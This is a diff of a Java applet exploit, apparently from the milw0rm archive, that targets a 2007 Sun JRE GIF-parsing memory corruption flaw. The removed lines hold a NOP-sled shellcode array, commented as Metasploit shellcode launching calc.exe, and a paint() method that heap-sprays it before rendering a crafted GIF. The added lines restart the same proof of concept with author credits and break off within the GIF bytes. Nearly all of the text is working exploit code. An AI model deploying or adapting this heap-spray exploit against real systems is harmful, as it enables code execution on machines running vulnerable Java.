-		(byte)0xc0, (byte)0xae, (byte)0x3c, (byte)0x90, (byte)0x88, (byte)0xe5, (byte)0x23, (byte)0xc7, (byte)0x0a, (byte)0x33, (byte)0xa7, (byte)0xd0, (byte)0x86, (byte)0xd0, (byte)0x6c, (byte)0x0d,
-		(byte)0x61, (byte)0x11, (byte)0x7a, (byte)0xd6, (byte)0x88, (byte)0x2a, (byte)0xd0, (byte)0xf2, (byte)0x44, (byte)0xeb, (byte)0x1c, (byte)0x02, (byte)0x32, (byte)0xe0, (byte)0xc1, (byte)0x79,
-		(byte)0xa8, (byte)0xb3, (byte)0x35, (byte)0x6f, (byte)0x11, (byte)0x8a, (byte)0x00, (byte)0x47, (byte)0x70, (byte)0xcf, (byte)0xc8, (byte)0x09, (byte)0xf1, (byte)0xb6, (byte)0x1e, (byte)0xb4,
-		(byte)0xc1, (byte)0x0e, (byte)0x3e, (byte)0xa7, (byte)0x03, (byte)0x07, (byte)0xe8, (byte)0x30, (byte)0xb7, (byte)0x34, (byte)0x44, (byte)0xe8, (byte)0x08, (byte)0x16, (byte)0x9f, (byte)0xfa,
-		(byte)0x2f, (byte)0x96, (byte)0x50, (byte)0x00, (byte)0x19, (byte)0x98, (byte)0xac, (byte)0x56, (byte)0x0f, (byte)0x13, (byte)0xef, (byte)0x18, (byte)0xfc, (byte)0x0b, (byte)0xf6, (byte)0x3d,
-		(byte)0x5f, (byte)0xfc, (byte)0x07, (byte)0xc6, (byte)0x9a, (byte)0x02, (byte)0x90, (byte)0x82, (byte)0xb4, (byte)0x30, (byte)0x9b, (byte)0xf3, (byte)0x41, (byte)0x46, (byte)0xe0, (byte)0x42,
-		(byte)0xd1, (byte)0xd4, (byte)0x09, (byte)0x61, (byte)0x01, (byte)0x5a, (byte)0xd1, (byte)0x01, (byte)0x4e, (byte)0x17, (byte)0x58, (byte)0xd9, (byte)0x17, (byte)0xf8, (byte)0xd0, (byte)0x31,
-		(byte)0xff, (byte)0x21, (byte)0x24, (byte)0x7b, (byte)0xef, (byte)0x48, (byte)0x7c, (byte)0x13, (byte)0xd6, (byte)0x7d, (byte)0x80, (byte)0x03, (byte)0x0e, (byte)0xa4, (byte)0x81, (byte)0x0e,
-		(byte)0x66, (byte)0x42, (byte)0x41, (byte)0x1a, (byte)0xbe, (byte)0x20, (byte)0x04, (byte)0x44, (byte)0x22, (byte)0x5e, (byte)0x10, (byte)0x7b, (byte)0x50, (byte)0xc2, (byte)0x14, (byte)0x9c,
-		(byte)0x84, (byte)0x83, (byte)0x20, (byte)0x31, (byte)0xc8, (byte)0x4c, (byte)0x63, (byte)0xa0, (byte)0x03, (byte)0x18, (byte)0x16, (byte)0xc0, (byte)0x8e, (byte)0xcb, (byte)0x07, (byte)0xa0,
-		(byte)0x08, (byte)0x4a, (byte)0x60, (byte)0x3c, (byte)0xd6, (byte)0x3b, (byte)0x0f, (byte)0x22, (byte)0x67, (byte)0x41, (byte)0x8c, (byte)0xf4, (byte)0x6a, (byte)0x1e, (byte)0xf9, (byte)0x80,
-		(byte)0xe6, (byte)0x30, (byte)0x83, (byte)0x19, (byte)0xf4, (byte)0x1c, (byte)0x07, (byte)0x38, (byte)0xe0, (byte)0x50, (byte)0x83, (byte)0x34, (byte)0x35, (byte)0x37, (byte)0x21, (byte)0xe0,
-		(byte)0xe5, (byte)0xf2, (byte)0x0c, (byte)0x48, (byte)0x42, (byte)0xe7, (byte)0xa5, (byte)0x83, (byte)0xf5, (byte)0x20, (byte)0xed, (byte)0xea, (byte)0x08, (byte)0x37, (byte)0x18, (byte)0x83,
-		(byte)0x19, (byte)0x44, (byte)0x7e, (byte)0x79, (byte)0x3d, (byte)0xec, (byte)0x01, (byte)0x07, (byte)0xb5, (byte)0xbf, (byte)0x3d, (byte)0x07, (byte)0xb6, (byte)0xf6, (byte)0xf7, (byte)0x34,
-		(byte)0x18, (byte)0x60, (byte)0x0d, (byte)0xf3, (byte)0xda, (byte)0x3b, (byte)0x03, (byte)0x42, (byte)0xb0, (byte)0x82, (byte)0x0e, (byte)0xd8, (byte)0xa1, (byte)0x0d, (byte)0xb9, (byte)0x0f,
-		(byte)0xcd, (byte)0xc6, (byte)0x7c, (byte)0xb0, (byte)0x32, (byte)0x21, (byte)0xc0, (byte)0xcc, (byte)0xf4, (byte)0xc1, (byte)0xef, (byte)0x40, (byte)0x82, (byte)0x72, (byte)0x3f, (byte)0x85,
-		(byte)0xba, (byte)0x59, (byte)0x67, (byte)0x41, (byte)0x17, (byte)0x50, (byte)0xc2, (byte)0x8b, (byte)0x4d, (byte)0xff, (byte)0xfc, (byte)0x15, (byte)0xd8, (byte)0x1e, (byte)0x02, (byte)0x6d,
-		(byte)0x60, (byte)0xd0, (byte)0xfb, (byte)0x89, (byte)0xc3, (byte)0x04, (byte)0x2c, (byte)0x28, (byte)0x1c, (byte)0xd3, (byte)0x7b, (byte)0x30, (byte)0x03, (byte)0xf6, (byte)0x87, (byte)0x7f,
-		(byte)0xa1, (byte)0x41, (byte)0x1b, (byte)0x0f, (byte)0x27, (byte)0x04, (byte)0xd9, (byte)0x87, (byte)0x78, (byte)0xb4, (byte)0x67, (byte)0x7b, (byte)0x6d, (byte)0xd0, (byte)0x06, (byte)0x3d,
-		(byte)0x30, (byte)0x05, (byte)0x3f, (byte)0x57, (byte)0x1b, (byte)0x0b, (byte)0x60, (byte)0x36, (byte)0x1c, (byte)0xb5, (byte)0x77, (byte)0x27, (byte)0xc0, (byte)0x21, (byte)0x76, (byte)0xa0,
-		(byte)0x20, (byte)0xe8, (byte)0x91, (byte)0x2d, (byte)0x32, (byte)0xc0, (byte)0x05, (byte)0x36, (byte)0xa0, (byte)0x18, (byte)0xa6, (byte)0x87, (byte)0x7a, (byte)0x6d, (byte)0x30, (byte)0x03,
-		(byte)0x53, (byte)0xc0, (byte)0x03, (byte)0x53, (byte)0xf0, (byte)0x70, (byte)0x37, (byte)0x73, (byte)0x04, (byte)0x05, (byte)0xe0, (byte)0x2a, (byte)0xff, (byte)0xa7, (byte)0x65, (byte)0xed,
-		(byte)0xd0, (byte)0x05, (byte)0x4a, (byte)0xd0, (byte)0x73, (byte)0xc8, (byte)0x02, (byte)0x17, (byte)0xb6, (byte)0x21, (byte)0x03, (byte)0x42, (byte)0xd0, (byte)0x03, (byte)0x18, (byte)0x94,
-		(byte)0xff, (byte)0x17, (byte)0x97, (byte)0xf7, (byte)0x01, (byte)0x36, (byte)0x30, (byte)0x01, (byte)0x25, (byte)0x13, (byte)0x4b, (byte)0x35, (byte)0x78, (byte)0x1c, (byte)0x6d, (byte)0x50,
-		(byte)0x45, (byte)0xa6, (byte)0x37, (byte)0x08, (byte)0x51, (byte)0xc0, (byte)0x04, (byte)0x42, (byte)0x00, (byte)0x01, (byte)0xcd, (byte)0x14, (byte)0x84, (byte)0x1a, (byte)0x57, (byte)0x00,
-		(byte)0x96, (byte)0xd7, (byte)0x82, (byte)0x7c, (byte)0x56, (byte)0x02, (byte)0x24, (byte)0x20, (byte)0x04, (byte)0x53, (byte)0x30, (byte)0x5b, (byte)0xb7, (byte)0x11, (byte)0x18, (byte)0x3c,
-		(byte)0x90, (byte)0x04, (byte)0xb2, (byte)0xb0, (byte)0x45, (byte)0xda, (byte)0x07, (byte)0x1f, (byte)0x3e, (byte)0x12, (byte)0x07, (byte)0x1a, (byte)0x77, (byte)0x85, (byte)0x6b, (byte)0xa0,
-		(byte)0x03, (byte)0xa7, (byte)0xd5, (byte)0x0a, (byte)0x0c, (byte)0xa6, (byte)0x6c, (byte)0x73, (byte)0x24, (byte)0x61, (byte)0x7d, (byte)0x70, (byte)0x2c, (byte)0x7d, (byte)0x80, (byte)0x1c,
-		(byte)0x6b, (byte)0x60, (byte)0x01, (byte)0x03, (byte)0x02, (byte)0x1f, (byte)0x7b, (byte)0x87, (byte)0x16, (byte)0x20, (byte)0x30, (byte)0x04, (byte)0x37, (byte)0xd8, (byte)0x07, (byte)0x6d,
-		(byte)0xf8, (byte)0x12, (byte)0x3c, (byte)0x40, (byte)0x3a, (byte)0xd2, (byte)0x50, (byte)0x35, (byte)0xa6, (byte)0x57, (byte)0x0e, (byte)0x15, (byte)0x00, (byte)0x86, (byte)0x43, (byte)0xf0,
-		(byte)0x12, (byte)0x2f, (byte)0x41, (byte)0x86, (byte)0xf0, (byte)0x11, (byte)0x87, (byte)0xa6, (byte)0x57, (byte)0x02, (byte)0x3a, (byte)0x90, (byte)0x0e, (byte)0x6b, (byte)0xe0, (byte)0x14,
-		(byte)0x45, (byte)0xb1, (byte)0x07, (byte)0x96, (byte)0x17, (byte)0x00, (byte)0xcb, (byte)0x50, (byte)0x84, (byte)0x01, (byte)0xe0, (byte)0x13, (byte)0x21, (byte)0x25, (byte)0x02, (byte)0x64,
-		(byte)0x60, (byte)0x19, (byte)0x3a, (byte)0xd0, (byte)0x05, (byte)0xde, (byte)0xf1, (byte)0x53, (byte)0x97, (byte)0xb7, (byte)0x04, (byte)0x77, (byte)0x10, (byte)0x52, (byte)0x83, (byte)0x08,
-		(byte)0x05, (byte)0x42, (byte)0x00, (byte)0x89, (byte)0xbc, (byte)0xc1, (byte)0x1a, (byte)0x50, (byte)0x88, (byte)0x69, (byte)0x12, (byte)0xc6, (byte)0x02, (byte)0x6d, (byte)0x08, (byte)0x05,
-		(byte)0x4a, (byte)0xe0, (byte)0x0b, (byte)0x59, (byte)0xa1, (byte)0x13, (byte)0x94, (byte)0x18, (byte)0x00, (byte)0x36, (byte)0xe0, (byte)0x16, (byte)0x6b, (byte)0x40, (byte)0x06, (byte)0xe6,
-		(byte)0xf7, (byte)0x7b, (byte)0xb3, (byte)0x58, (byte)0x08, (byte)0xbc, (byte)0xa0, (byte)0x04, (byte)0x64, (byte)0xd0, (byte)0x07, (byte)0x4a, (byte)0xc0, (byte)0x63, (byte)0xbb, (byte)0x58,
-		(byte)0x08, (byte)0x0c, (byte)0x30, (byte)0x07, (byte)0x15, (byte)0xa0, (byte)0x0d, (byte)0x7b, (byte)0xb0, (byte)0x04, (byte)0xcc, (byte)0x80, (byte)0x88, (byte)0xc3, (byte)0x18, (byte)0x05,
-		(byte)0x24, (byte)0x70, (byte)0x07, (byte)0x2a, (byte)0x80, (byte)0x05, (byte)0xc3, (byte)0x88, (byte)0x08, (byte)0x8d, (byte)0x24, (byte)0x00, (byte)0x36, (byte)0x50, (byte)0x02, (byte)0xa9,
-		(byte)0x78, (byte)0x71, (byte)0xf7, (byte)0x35, (byte)0x8d, (byte)0xdc, (byte)0x68, (byte)0x39, (byte)0x18, (byte)0x57, (byte)0x74, (byte)0x88, (byte)0xc7, (byte)0x8c, (byte)0xcc, (byte)0xd8,
-		(byte)0x09, (byte)0x8d, (byte)0x3f, (byte)0x74, (byte)0x86, (byte)0xe4, (byte)0x28, (byte)0x1f, (byte)0x81, (byte)0x00, (byte)0x00, (byte)0x3b
-	};
-	byte[] shellcode = new byte[]
-	{
-		(byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90,
-		// shellcode copied from metasploit to run calc.exe
-		(byte)0x29, (byte)0xc9, (byte)0x83, (byte)0xe9, (byte)0xde, (byte)0xd9, (byte)0xee, (byte)0xd9, (byte)0x74, (byte)0x24, (byte)0xf4, (byte)0x5b, (byte)0x81, (byte)0x73, (byte)0x13, (byte)0x38,
-		(byte)0x09, (byte)0x13, (byte)0x8e, (byte)0x83, (byte)0xeb, (byte)0xfc, (byte)0xe2, (byte)0xf4, (byte)0xc4, (byte)0xe1, (byte)0x57, (byte)0x8e, (byte)0x38, (byte)0x09, (byte)0x98, (byte)0xcb,
-		(byte)0x04, (byte)0x82, (byte)0x6f, (byte)0x8b, (byte)0x40, (byte)0x08, (byte)0xfc, (byte)0x05, (byte)0x77, (byte)0x11, (byte)0x98, (byte)0xd1, (byte)0x18, (byte)0x08, (byte)0xf8, (byte)0xc7,
-		(byte)0xb3, (byte)0x3d, (byte)0x98, (byte)0x8f, (byte)0xd6, (byte)0x38, (byte)0xd3, (byte)0x17, (byte)0x94, (byte)0x8d, (byte)0xd3, (byte)0xfa, (byte)0x3f, (byte)0xc8, (byte)0xd9, (byte)0x83,
-		(byte)0x39, (byte)0xcb, (byte)0xf8, (byte)0x7a, (byte)0x03, (byte)0x5d, (byte)0x37, (byte)0x8a, (byte)0x4d, (byte)0xec, (byte)0x98, (byte)0xd1, (byte)0x1c, (byte)0x08, (byte)0xf8, (byte)0xe8,
-		(byte)0xb3, (byte)0x05, (byte)0x58, (byte)0x05, (byte)0x67, (byte)0x15, (byte)0x12, (byte)0x65, (byte)0xb3, (byte)0x15, (byte)0x98, (byte)0x8f, (byte)0xd3, (byte)0x80, (byte)0x4f, (byte)0xaa,
-		(byte)0x3c, (byte)0xca, (byte)0x22, (byte)0x4e, (byte)0x5c, (byte)0x82, (byte)0x53, (byte)0xbe, (byte)0xbd, (byte)0xc9, (byte)0x6b, (byte)0x82, (byte)0xb3, (byte)0x49, (byte)0x1f, (byte)0x05,
-		(byte)0x48, (byte)0x15, (byte)0xbe, (byte)0x05, (byte)0x50, (byte)0x01, (byte)0xf8, (byte)0x87, (byte)0xb3, (byte)0x89, (byte)0xa3, (byte)0x8e, (byte)0x38, (byte)0x09, (byte)0x98, (byte)0xe6,
-		(byte)0x04, (byte)0x56, (byte)0x22, (byte)0x78, (byte)0x58, (byte)0x5f, (byte)0x9a, (byte)0x76, (byte)0xbb, (byte)0xc9, (byte)0x68, (byte)0xde, (byte)0x50, (byte)0xf9, (byte)0x99, (byte)0x8a,
-		(byte)0x67, (byte)0x61, (byte)0x8b, (byte)0x70, (byte)0xb2, (byte)0x07, (byte)0x44, (byte)0x71, (byte)0xdf, (byte)0x6a, (byte)0x72, (byte)0xe2, (byte)0x5b, (byte)0x09, (byte)0x13, (byte)0x8e
-	};
-
-	public void init() {
-		image = Toolkit.getDefaultToolkit().createImage(imageBytes);
-	}
-
-	public void paint(Graphics g) {
-		int heapBlockSize = 0x5000000;
-		int heapSlidSize = 0x100000;
-		byte[] buffer = new byte[heapBlockSize];
-		byte heapFilling = (byte)0x24;
-
-		for (int i = 0; i < buffer.length; i ++) {
-			buffer[i] = heapFilling;
-		}
-
-		for (int i = 1; i < 0x50; i ++) {
-			for (int j = 0; j < shellcode.length; j ++) {
-				buffer[i * heapSlidSize - shellcode.length - 0x1000 + j] = shellcode[j];
-			}
-		}
-
-		if (image != null) {
-			g.drawImage(image, 0, 0, this);
-		}
-	}
-}
-
-// milw0rm.com [2007-01-21]
+/*
+*
+* FileName: JvmGifVulPoc.java
+*
+* Date: 2007-01-21
+*
+* Description: Sun Microsystems Java GIF File Parsing Memory Corruption Vulnerability Prove Of Concept Exploit
+*
+* Environment: Only successfully tested on Sun Jre 1.5
+*
+* Author: luoluo
+*
+* Contact: luoluonet_at_hotmail.com || luoluonet_at_126.com || luoluonet_at_yahoo.com
+*
+* Team: PST(Ph4nt0m Security Team, http://www.ph4nt0m.org) from P.R.C.
+*
+* Thanks YunShu very much, he helps to find a simple way to modify the width of image block.
+* Thanks all friends from ph4nt0m secutiry team, espacially Axis SuperHei Onlyu Nop EnvyMask CoCo OYXin Mix and etc.
+* Best wishes to the newly married couple TomyChen and his wife!
+*
+* 
+*/
+
+import java.io.*;
+import java.applet.*;
+import javax.imageio.*;
+import java.util.*;
+import java.awt.*;
+
+public class JvmGifVulPoc extends Applet {
+	private Image image = null;	
+	byte[] imageBytes = new byte[]
+	{
+		(byte)0x47, (byte)0x49, (byte)0x46, (byte)0x38, (byte)0x39, (byte)0x61, (byte)0x96, (byte)0x00, (byte)0x8c, (byte)0x00, (byte)0xe6, (byte)0x00, (byte)0x00, (byte)0x2d, (byte)0x20, (byte)0x21,
+		(byte)0x4a, (byte)0x6c, (byte)0xbd, (byte)0x49, (byte)0x5b, (byte)0x91, (byte)0x7b, (byte)0x88, (byte)0xc4, (byte)0x69, (byte)0x59, (byte)0x51, (byte)0x6d, (byte)0x71, (byte)0x8e, (byte)0x5b,	
+		(byte)0x4b, (byte)0x39, (byte)0x7b, (byte)0x63, (byte)0x59, (byte)0xb8, (byte)0xaa, (byte)0x97, (byte)0xfe, (byte)0xf8, (byte)0xec, (byte)0x26, (byte)0x26, (byte)0x41, (byte)0x4b, (byte)0x47,
+		(byte)0x58, (byte)0x4a, (byte)0x6c, (byte)0xb3, (byte)0x91, (byte)0x7b, (byte)0x6f, (byte)0xf4, (byte)0xe7, (byte)0xda, (byte)0xa9, (byte)0x95, (byte)0x8c, (byte)0x60, (byte)0x5b, (byte)0x64,
+		(byte)0x52, (byte)0x3f, (byte)0x3a, (byte)0xea, (byte)0xd7, (byte)0xc6, (byte)0x45, (byte)0x4b, (byte)0x63, (byte)0x49, (byte)0x33, (byte)0x2e, (byte)0x3e, (byte)0x39, (byte)0x4e, (byte)0x5f,
+		(byte)0x6a, (byte)0x92, (byte)0x74, (byte)0x64, (byte)0x63, (byte)0xde, (byte)0xc8, (byte)0xbd, (byte)0xd4, (byte)0xb5, (byte)0xa3, (byte)0xa4, (byte)0x82, (byte)0x71, (byte)0x61, (byte)0x4b,
+		(byte)0x3b, (byte)0x7d, (byte)0x6c, (byte)0x6a, (byte)0x99, (byte)0x99, (byte)0x99, (byte)0x40, (byte)0x2c, (byte)0x28, (byte)0x52, (byte)0x6a, (byte)0xbe, (byte)0x52, (byte)0x5b, (byte)0x81,
+		(byte)0x76, (byte)0x7a, (byte)0x96, (byte)0x4a, (byte)0x3c, (byte)0x3a, (byte)0x52, (byte)0x6b, (byte)0xb5, (byte)0x33, (byte)0x33, (byte)0x66, (byte)0x50, (byte)0x6b, (byte)0xaf, (byte)0xbf,
+		(byte)0xc2, (byte)0xde, (byte)0x58, (byte)0x66, (byte)0x9b, (byte)0x72, (byte)0x5c, (byte)0x54, (byte)0x63, (byte)0x52, (byte)0x53, (byte)0x42, (byte)0x4f, (byte)0x7a, (byte)0xa6, (byte)0x9c,
+		(byte)0xa2, (byte)0x33, (byte)0x28, (byte)0x33, (byte)0xff, (byte)0xff, (byte)0xff, (byte)0xa4, (byte)0x8d, (byte)0x84, (byte)0xe3, (byte)0xbf, (byte)0xa5, (byte)0x43, (byte)0x32, (byte)0x3a,
+		(byte)0x54, (byte)0x30, (byte)0x2d, (byte)0x53, (byte)0x4a, (byte)0x4b, (byte)0x8c, (byte)0x81, (byte)0x8c, (byte)0x85, (byte)0x73, (byte)0x6c, (byte)0x85, (byte)0x6a, (byte)0x61, (byte)0x58,
+		(byte)0x6c, (byte)0xa6, (byte)0x63, (byte)0x52, (byte)0x4a, (byte)0x87, (byte)0x7b, (byte)0x7f, (byte)0xf6, (byte)0xee, (byte)0xe7, (byte)0x5c, (byte)0x60, (byte)0x7e, (byte)0xb6, (byte)0xb6,
+		(byte)0xd1, (byte)0x5a, (byte)0x51, (byte)0x54, (byte)0x62, (byte)0x58, (byte)0x5a, (byte)0x72, (byte)0x66, (byte)0x6b, (byte)0x53, (byte)0x73, (byte)0xb6, (byte)0x37, (byte)0x2a, (byte)0x26,
+		(byte)0xc9, (byte)0xa5, (byte)0x8e, (byte)0x47, (byte)0x43, (byte)0x4d, (byte)0x3b, (byte)0x37, (byte)0x3b, (byte)0x89, (byte)0x8c, (byte)0xa6, (byte)0x51, (byte)0x60, (byte)0x8f, (byte)0xd4,
+		(byte)0xd6, (byte)0xdc, (byte)0x55, (byte)0x43, (byte)0x44, (byte)0x4b, (byte)0x6b, (byte)0xc4, (byte)0x67, (byte)0x72, (byte)0x9d, (byte)0x55, (byte)0x51, (byte)0x68, (byte)0x55, (byte)0x73,
+		(byte)0xbd, (byte)0x40, (byte)0x44, (byte)0x60, (byte)0x8c, (byte)0x71, (byte)0x6f, (byte)0xb7, (byte)0x9c, (byte)0x8e, (byte)0xfe, (byte)0xfb, (byte)0xf6, (byte)0x41, (byte)0x31, (byte)0x2c,
+		(byte)0x52, (byte)0x64, (byte)0xa6, (byte)0x58, (byte)0x41, (byte)0x31, (byte)0x66, (byte)0x66, (byte)0x66, (byte)0x49, (byte)0x54, (byte)0x78, (byte)0xce, (byte)0xb8, (byte)0xb1, (byte)0xeb,
+		(byte)0xdc, (byte)0xd1, (byte)0xaa, (byte)0xa5, (byte)0xbe, (byte)0x5d, (byte)0x6f, (byte)0xac, (byte)0xe3, (byte)0xc8, (byte)0xb7, (byte)0x92, (byte)0x5b, (byte)0x5f, (byte)0xa1, (byte)0x84,
+		(byte)0x7c, (byte)0x65, (byte)0x69, (byte)0x7c, (byte)0x59, (byte)0x6b, (byte)0x9c, (byte)0xb0, (byte)0x90, (byte)0x7d, (byte)0x5a, (byte)0x49, (byte)0x41, (byte)0x4b, (byte)0x39, (byte)0x31,
+		(byte)0xe9, (byte)0xeb, (byte)0xf4, (byte)0x9c, (byte)0x94, (byte)0xad, (byte)0x74, (byte)0x63, (byte)0x59, (byte)0x33, (byte)0x33, (byte)0x33, (byte)0xc5, (byte)0xaa, (byte)0x9c, (byte)0x5a,
+		(byte)0x4c, (byte)0x4b, (byte)0x6a, (byte)0x52, (byte)0x4b, (byte)0xae, (byte)0x75, (byte)0x78, (byte)0x7b, (byte)0x69, (byte)0x62, (byte)0x74, (byte)0x7e, (byte)0xae, (byte)0x4a, (byte)0x40,
+		(byte)0x42, (byte)0x59, (byte)0x3e, (byte)0x3c, (byte)0x73, (byte)0x6c, (byte)0x74, (byte)0x51, (byte)0x39, (byte)0x2f, (byte)0xb5, (byte)0x9e, (byte)0x97, (byte)0x2f, (byte)0x2f, (byte)0x40,
+		(byte)0x52, (byte)0x4b, (byte)0x55, (byte)0xf6, (byte)0xef, (byte)0xdf, (byte)0x63, (byte)0x70, (byte)0xa3, (byte)0x6c, (byte)0x5c, (byte)0x5b, (byte)0x48, (byte)0x71, (byte)0xbb, (byte)0x7a,
+		(byte)0x70, (byte)0x77, (byte)0x3b, (byte)0x44, (byte)0x69, (byte)0x5b, (byte)0x72, (byte)0xb5, (byte)0x6a, (byte)0x55, (byte)0x51, (byte)0x4c, (byte)0x71, (byte)0xb6, (byte)0x5b, (byte)0x64,
+		(byte)0x90, (byte)0x64, (byte)0x4e, (byte)0x43, (byte)0x42, (byte)0x3a, (byte)0x3c, (byte)0x6c, (byte)0x7c, (byte)0xab, (byte)0x93, (byte)0x72, (byte)0x66, (byte)0x21, (byte)0xf9, (byte)0x04,
+		(byte)0x04, (byte)0x14, (byte)0x00, (byte)0xff, (byte)0x00, (byte)0x2c, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x8c, (byte)0x00, (byte)0x00, (byte)0x07,
+		(byte)0xff, (byte)0x80, (byte)0x24, (byte)0x82, (byte)0x83, (byte)0x84, (byte)0x85, (byte)0x86, (byte)0x87, (byte)0x88, (byte)0x89, (byte)0x8a, (byte)0x8b, (byte)0x8c, (byte)0x8d, (byte)0x8e,
+		(byte)0x8f, (byte)0x90, (byte)0x91, (byte)0x92, (byte)0x93, (byte)0x94, (byte)0x95, (byte)0x96, (byte)0x97, (byte)0x98, (byte)0x99, (byte)0x9a, (byte)0x9b, (byte)0x9c, (byte)0x9d, (byte)0x9e,
+		(byte)0x9f, (byte)0xa0, (byte)0xa1, (byte)0xa2, (byte)0xa3, (byte)0xa4, (byte)0xa5, (byte)0xa6, (byte)0xa7, (byte)0xa8, (byte)0x01, (byte)0x25, (byte)0x25, (byte)0x1f, (byte)0x75, (byte)0x23,
+		(byte)0x23, (byte)0x0c, (byte)0x1f, (byte)0x1f, (byte)0xaf, (byte)0xa9, (byte)0xb5, (byte)0xb6, (byte)0x8d, (byte)0xab, (byte)0xb2, (byte)0x51, (byte)0x02, (byte)0x77, (byte)0x51, (byte)0x1f,
+		(byte)0x0c, (byte)0x0c, (byte)0xb7, (byte)0xc2, (byte)0xc3, (byte)0x87, (byte)0x4b, (byte)0x27, (byte)0x0a, (byte)0x43, (byte)0x54, (byte)0x23, (byte)0x75, (byte)0xae, (byte)0x23, (byte)0xc4,
+		(byte)0xcf, (byte)0xa6, (byte)0x7a, (byte)0x7a, (byte)0xb2, (byte)0x7a, (byte)0x82, (byte)0x51, (byte)0x77, (byte)0x43, (byte)0x2c, (byte)0x0b, (byte)0x45, (byte)0xcc, (byte)0xb2, (byte)0xd0,
+		(byte)0xdf, (byte)0xa2, (byte)0xd2, (byte)0xd4, (byte)0x01, (byte)0x4b, (byte)0x02, (byte)0x0a, (byte)0x64, (byte)0x30, (byte)0x30, (byte)0x13, (byte)0x25, (byte)0x48, (byte)0xb3, (byte)0xe0,
+		(byte)0xef, (byte)0xa5, (byte)0x73, (byte)0x70, (byte)0x2c, (byte)0x30, (byte)0x2c, (byte)0x42, (byte)0x02, (byte)0xe3, (byte)0xf0, (byte)0xfa, (byte)0x9f, (byte)0x23, (byte)0xd8, (byte)0x2c,
+		(byte)0xff, (byte)0x64, (byte)0x26, (byte)0xd8, (byte)0xa8, (byte)0xb6, (byte)0xaf, (byte)0x20, (byte)0x27, (byte)0x3c, (byte)0x24, (byte)0x00, (byte)0xf4, (byte)0xf9, (byte)0xc7, (byte)0xa2,
+		(byte)0x02, (byte)0x88, (byte)0x1f, (byte)0x06, (byte)0x23, (byte)0x66, (byte)0xc2, (byte)0xc3, (byte)0x04, (byte)0x00, (byte)0x99, (byte)0x6c, (byte)0xf4, (byte)0x04, (byte)0x1e, (byte)0x92,
+		(byte)0x26, (byte)0xb1, (byte)0x63, (byte)0x22, (byte)0x71, (byte)0x02, (byte)0x98, (byte)0x90, (byte)0x61, (byte)0xf8, (byte)0x4f, (byte)0x48, (byte)0x91, (byte)0x25, (byte)0x1e, (byte)0x53,
+		(byte)0x3e, (byte)0x5a, (byte)0x42, (byte)0x42, (byte)0xc1, (byte)0x9a, (byte)0x3e, (byte)0x40, (byte)0x80, (byte)0x40, (byte)0x01, (byte)0xd2, (byte)0x47, (byte)0x19, (byte)0x12, (byte)0x24,
+		(byte)0xd2, (byte)0x72, (byte)0xaa, (byte)0xdc, (byte)0x49, (byte)0x08, (byte)0x8f, (byte)0x8a, (byte)0x7f, (byte)0x32, (byte)0x62, (byte)0xc2, (byte)0xf0, (byte)0x30, (byte)0x64, (byte)0x41,
+		(byte)0x14, (byte)0x42, (byte)0xe2, (byte)0x78, (byte)0x2a, (byte)0xb5, (byte)0x81, (byte)0x6d, (byte)0xc8, (byte)0x10, (byte)0x30, (byte)0x50, (byte)0xa2, (byte)0x42, (byte)0x59, (byte)0x53,
+		(byte)0x04, (byte)0x62, (byte)0x80, (byte)0x9c, (byte)0x1f, (byte)0x94, (byte)0xa6, (byte)0x24, (byte)0x68, (byte)0x4e, (byte)0x48, (byte)0x9c, (byte)0xa7, (byte)0x60, (byte)0xd2, (byte)0x01,
+		(byte)0x11, (byte)0x41, (byte)0x25, (byte)0xd7, (byte)0x07, (byte)0x8e, (byte)0x5a, (byte)0x3d, (byte)0x06, (byte)0x0b, (byte)0x20, (byte)0x00, (byte)0x0e, (byte)0x99, (byte)0x1e, (byte)0x32,
+		(byte)0xff, (byte)0xc0, (byte)0x84, (byte)0x1d, (byte)0x4a, (byte)0x61, (byte)0xc2, (byte)0x89, (byte)0x11, (byte)0x37, (byte)0xd1, (byte)0xa6, (byte)0x95, (byte)0x08, (byte)0xec, (byte)0xc3,
+		(byte)0x89, (byte)0x0a, (byte)0x6b, (byte)0xd6, (byte)0x98, (byte)0x39, (byte)0x92, (byte)0x0e, (byte)0x46, (byte)0xd4, (byte)0x38, (byte)0x27, (byte)0x6f, (byte)0x22, (byte)0x59, (byte)0xbb,
+		(byte)0x37, (byte)0x22, (byte)0xb0, (byte)0x25, (byte)0x2a, (byte)0x86, (byte)0xf8, (byte)0x08, (byte)0x2c, (byte)0x63, (byte)0x4d, (byte)0x61, (byte)0x18, (byte)0x11, (byte)0x74, (byte)0x20,
+		(byte)0x6d, (byte)0xdc, (byte)0x71, (byte)0x9a, (byte)0x0a, (byte)0x32, (byte)0x3e, (byte)0xe8, (byte)0x1c, (byte)0x39, (byte)0x22, (byte)0x43, (byte)0x84, (byte)0xe9, (byte)0x74, (byte)0x54,
+		(byte)0x18, (byte)0x30, (byte)0xab, (byte)0x43, (byte)0x90, (byte)0x73, (byte)0xc4, (byte)0x11, (byte)0x7b, (byte)0x78, (byte)0xc8, (byte)0xa0, (byte)0x93, (byte)0x42, (byte)0x46, (byte)0xe5,
+		(byte)0xc0, (byte)0x22, (byte)0x28, (byte)0x28, (byte)0x29, (byte)0xb1, (byte)0xba, (byte)0xb5, (byte)0xeb, (byte)0x82, (byte)0x51, (byte)0x40, (byte)0xcc, (byte)0xe8, (byte)0xc1, (byte)0x83,
+		(byte)0xb6, (byte)0xed, (byte)0xc0, (byte)0x6b, (byte)0x44, (byte)0x54, (byte)0x38, (byte)0x81, (byte)0xf2, (byte)0x77, (byte)0xc7, (byte)0x22, (byte)0x70, (byte)0xec, (byte)0x0c, (byte)0x4f,
+		(byte)0x41, (byte)0xc7, (byte)0x8c, (byte)0x99, (byte)0x08, (byte)0xa6, (byte)0x45, (byte)0xb0, (byte)0x50, (byte)0xd1, (byte)0xdc, (byte)0x99, (byte)0xf3, (byte)0x7d, (byte)0x1f, (byte)0xe6,
+		(byte)0xb4, (byte)0xe1, (byte)0x31, (byte)0xc3, (byte)0x4e, (byte)0x8f, (byte)0xf3, (byte)0x66, (byte)0x4c, (byte)0x47, (byte)0x88, (byte)0x00, (byte)0xa3, (byte)0x02, (byte)0x1e, (byte)0x41,
